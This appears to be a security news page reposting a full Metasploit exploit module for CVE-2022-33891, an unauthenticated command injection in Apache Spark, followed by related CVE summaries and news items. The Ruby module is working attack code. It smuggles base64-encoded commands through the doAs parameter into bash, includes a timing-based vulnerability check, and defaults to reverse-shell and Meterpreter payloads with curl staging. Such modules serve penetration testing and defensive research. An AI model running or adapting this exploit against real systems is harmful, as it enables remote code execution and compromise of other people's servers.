Security
Headlines
HeadlinesLatestCVEs

Headline

Apache Spark Unauthenticated Command Injection

This Metasploit module exploits an unauthenticated command injection vulnerability in Apache Spark. Successful exploitation results in remote code execution under the context of the Spark application user. The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command. It is triggered by a non-default setting called spark.acls.enable. This configuration setting spark.acls.enable should be set true in the Spark configuration to make the application vulnerable for this attack. Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected by this vulnerability.

Packet Storm
#vulnerability#linux#apache#git#rce#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache Spark Unauthenticated Command Injection RCE',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in Apache Spark.          Successful exploitation results in remote code execution under the context of the Spark application user.          The command injection occurs because Spark checks the group membership of the user passed          in the ?doAs parameter by using a raw Linux command.          It is triggered by a non-default setting called spark.acls.enable.          This configuration setting spark.acls.enable should be set true in the Spark configuration to make the application vulnerable for this attack.          Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected by this vulnerability.        },        'License' => MSF_LICENSE,        'Author' => [          'Kostya Kortchinsky', # Security researcher and discovery of the vulnerability          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author & Metasploit module        ],        'References' => [          ['URL', 'https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc'], # Disclosure          ['URL', 'https://attackerkb.com/topics/5FyKBES4BL/cve-2022-33891'], # Analysis          ['CVE', '2022-33891']        ],        'DefaultOptions' => {          'SSL' => false,          'WfsDelay' => 5        },        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Unix (In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :in_memory,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_python'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :dropper,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'CmdStagerFlavor' => ['printf', 'curl'],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2022-07-18',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])      ]    )  end  def execute_command(cmd, _opts = {})    b64 = Rex::Text.encode_base64(cmd)    post_data = "doAs=\`echo #{b64} | base64 -d | bash\`"    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/'),      'data' => post_data    })  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT => e    elog("A communication error occurred: #{e.message}", error: e)  end  def check    print_status("Checking if #{peer} can be exploited!")    res = execute_command("echo #{Rex::Text.rand_text_alpha_lower(8..12)}")    return CheckCode::Unknown('Did not receive a response from target.') unless res    if res.code != 403      return CheckCode::Safe('Target did not respond with a 403 response.')    end    sleep_time = rand(5..10)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    print_status("Elapsed time: #{elapsed_time} seconds.")    unless res && elapsed_time >= sleep_time      return CheckCode::Safe('Failed to test command injection.')    end    CheckCode::Vulnerable('Successfully tested command injection.')  end  def exploit    print_status('Exploiting...')    case target['Type']    when :in_memory      execute_command(payload.encoded)    when :dropper      execute_cmdstager(linemax: 1024) # set an appropriate :linemax dependent upon available space    end  endend

Related news

CVE-2023-32007: Security | Apache Spark

** UNSUPPORTED WHEN ASSIGNED ** The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This issue was disclosed earlier as CVE-2022-33891, but incorrectly claimed version 3.1.3 (which has since gone EOL) would not be affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Users are recommended to upgrade to a supported version of Apache Spark, such as version 3.4.0.

CISA's KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The list of vulnerabilities is below - CVE-2022-35914 (CVSS score: 9.8) - Teclib GLPI Remote Code Execution Vulnerability CVE-2022-33891 (CVSS score: 8.8) - Apache Spark Command Injection Vulnerability

Zerobot Botnet Emerges as a Growing Threat with New Exploits and Capabilities

The Zerobot DDoS botnet has received substantial updates that expand on its ability to target more internet-connected devices and scale its network. Microsoft Threat Intelligence Center (MSTIC) is tracking the ongoing threat under the moniker DEV-1061, its designation for unknown, emerging, or developing activity clusters. Zerobot, first documented by Fortinet FortiGuard Labs earlier this month,

CVE-2022-33891

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

CVE-2018-11804: Security | Apache Spark

Spark's Apache Maven-based build includes a convenience script, 'build/mvn', that downloads and runs a zinc server to speed up compilation. It has been included in release branches since 1.3.x, up to and including master. This server will accept connections from external hosts by default. A specially-crafted request to the zinc server could cause it to reveal information in files readable to the developer account running the build. Note that this issue does not affect end users of Spark, only developers building Spark from source code.

CVE-2018-11770: Security | Apache Spark

From version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.re...

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution